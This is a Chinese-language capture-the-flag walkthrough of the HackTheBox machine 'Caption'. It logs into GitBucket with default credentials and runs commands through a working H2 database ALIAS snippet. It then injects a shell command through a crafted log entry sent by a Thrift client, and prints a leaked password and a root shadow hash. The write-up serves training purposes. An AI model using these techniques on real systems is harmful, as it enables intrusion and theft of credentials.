基本信息
- https://app.hackthebox.com/machines/Caption
- 10.10.11.33
data:image/s3,"s3://crabby-images/0c394/0c3942126c74b8e9dc89b6f070ec38abbd31c885" alt=""
端口扫描
22,80,8080:
1 | nmap -sC -sV -Pn 10.10.11.33 |
80
需要加hosts:
1 | 10.10.11.33 caption.htb |
需要登录:
data:image/s3,"s3://crabby-images/c17bd/c17bdfe10a561f732acbe10b7bf83b65311de94f" alt=""
8080
是一个GitBucket:
data:image/s3,"s3://crabby-images/a9fd4/a9fd459a8c531172d5e36f8fa029e4a51733a00f" alt=""
GitBucket
默认账号密码登录:
- gitbucket/README.md at master · gitbucket/gitbucket
https://github.com/gitbucket/gitbucket/blob/master/README.md#installation
1 | root : root |
data:image/s3,"s3://crabby-images/8a1fd/8a1fd00597af7a95d25909d25474b2c6dd8c9820" alt=""
Logservice
看起来可能有命令注入:
data:image/s3,"s3://crabby-images/55560/55560b79e0bf0dcd66af7396587f7ce4bfdd76eb" alt=""
Caption-Portal
查看commoits,历史版本配置文件中可以得到一组账号密码:
1 | margo : vFr&cS2#0! |
data:image/s3,"s3://crabby-images/85e87/85e87d518861a0b53d32f6f7098485146e40dd94" alt=""
Caption-Portal
得到的账号密码可以登录80的Portal:
data:image/s3,"s3://crabby-images/258b4/258b4b5a2c88c95dbcdce63eb7d2953e50470d75" alt=""
logs
访问是403:
data:image/s3,"s3://crabby-images/f49e4/f49e416d8b9d088d8c5a9b32411f6a1bea47e7fe" alt=""
GitBucket dbviewer(非预期)
GitBucket 自带的dbviewer功能可以执行sql,后端是H2数据库:
data:image/s3,"s3://crabby-images/8012b/8012baf714d9135bd02470eb7f7730bdfbf6e64f" alt=""
- Abusing H2 Database ALIAS - Gambler - Hacking and other stuffs
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
参考执行命令,得到margo私钥:
1 | CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$; |
data:image/s3,"s3://crabby-images/4717d/4717d2f557100b8caa7b299f142209153e275095" alt=""
预期 user
预期方式是请求走私
- 使用 H2CSmuggler 通过 HTTP2 升级绕过 HAproxy ACL
- 毒化缓存并在 UTM_Source 跟踪器中放置 XSS 有效载荷
- 获得管理员 Cookie,使用它通过 h2csmuggler 访问日志页面
- 查看日志,发现有一个 margo 使用的 ecdsa 密钥
- 谷歌搜索我们下载日志的 URL,发现其copyparty存在文件泄露漏洞
- 然后读取私钥
参考:
- HackTheBox - Caption - YouTube
https://www.youtube.com/watch?v=JY_xds4LsW0 - HTB: Caption | 0xdf hacks stuff
https://0xdf.gitlab.io/2025/01/25/htb-caption.html#
user flag
使用得到的私钥登录:
data:image/s3,"s3://crabby-images/d4d83/d4d83aad452e7cfac1299049dff94db4ea7a7421" alt=""
信息
运行pspy64可以发现和log相关的东西,前面在gitbucket里也可以看到可能的命令注入:
data:image/s3,"s3://crabby-images/5f9a1/5f9a11d2be42c57513e19c8dec378577559290e4" alt=""
thrift
另外LogService代码中也可以看到Thrift 文件:
- Apache Thrift - Python
https://thrift.apache.org/tutorial/py.html
data:image/s3,"s3://crabby-images/ad4cc/ad4cc98d1a59751e59a9631b1cf3635f663eec81" alt=""
参考文档,克隆项目后运行生成代码:
1 | git clone http://caption.htb:8080/git/root/Logservice.git |
data:image/s3,"s3://crabby-images/49d88/49d883bc1fe40bdf75db478e2bf2443222699e6c" alt=""
查看生成的代码可以确认是能够控制filePath调用log,端口是 9090也可以查看本地端口确认:
data:image/s3,"s3://crabby-images/18ba4/18ba4169f191e70660afef69551a923f04f02dc5" alt=""
命令注入 & root flag
然后就可以自己根据代码逻辑创建恶意日志文件,然后自定义客户端连接服务,提交恶意日志,触发命令注入:
需要转发端口本地运行客户端,server上没python thrift库:
1 | tar czvf gen-py.tar gen-py |
data:image/s3,"s3://crabby-images/ce782/ce782f099b83676274f911906d216d43462315b4" alt=""
data:image/s3,"s3://crabby-images/d438d/d438d799a6c1e1110aab788f13a6e4ddc87e9d12" alt=""
client.py
1 | from thrift import Thrift |
miao.log
1 | 127.0.0.1 "user-agent":"'; /bin/bash /tmp/miao/shell.sh #" |
shadow
1 | root:$y$j9T$Z0mAEpyXxUFgbF4zyQYIm0$tfEWxKHM9Yv0fztCJ6GT/RYj87nvBZIl3t8ssYc3GnB:19956:0:99999:7::: |
参考资料
- gitbucket/README.md at master · gitbucket/gitbucket
https://github.com/gitbucket/gitbucket/blob/master/README.md#installation - Abusing H2 Database ALIAS - Gambler - Hacking and other stuffs
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html - Apache Thrift - Python
https://thrift.apache.org/tutorial/py.html - HackTheBox - Caption - YouTube
https://www.youtube.com/watch?v=JY_xds4LsW0 - HTB: Caption | 0xdf hacks stuff
https://0xdf.gitlab.io/2025/01/25/htb-caption.html#